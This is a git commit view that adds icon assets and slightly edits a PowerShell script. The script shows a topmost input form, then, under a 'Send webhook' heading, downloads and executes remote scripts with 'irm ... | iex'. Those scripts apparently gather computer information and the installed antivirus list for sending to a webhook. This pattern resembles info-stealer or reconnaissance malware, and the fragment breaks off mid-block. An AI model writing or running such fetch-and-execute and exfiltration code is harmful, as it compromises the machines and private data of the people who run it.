Added assets

This commit is contained in:
Joeri 2026-02-20 15:05:57 +01:00
parent 7d66fc7a2e
commit e1c00a8c07
3 changed files with 3 additions and 2 deletions

BIN
assets/logo.ico Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.2 KiB

BIN
assets/logo.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 6.3 KiB

View file

@ -22,6 +22,7 @@ $form.Size = New-Object System.Drawing.Size(320, 160)
$form.StartPosition = "CenterScreen"
$form.Topmost = $true
$form.KeyPreview = $true
$form.Icon = New-Object System.Drawing.Icon("C:\Path\To\Icon.ico")
# Form label
$lbl = New-Object System.Windows.Forms.Label
@ -68,7 +69,7 @@ if ($result -eq [System.Windows.Forms.DialogResult]::OK) {
exit
}
# === SEND TO WEBHOOK ====================================================
# Send webhook
try {
$GetComputerInfo = irm $ScriptGetComputerInfo | iex
$GetInstalledAV = irm $ScriptGetInstalledAV | iex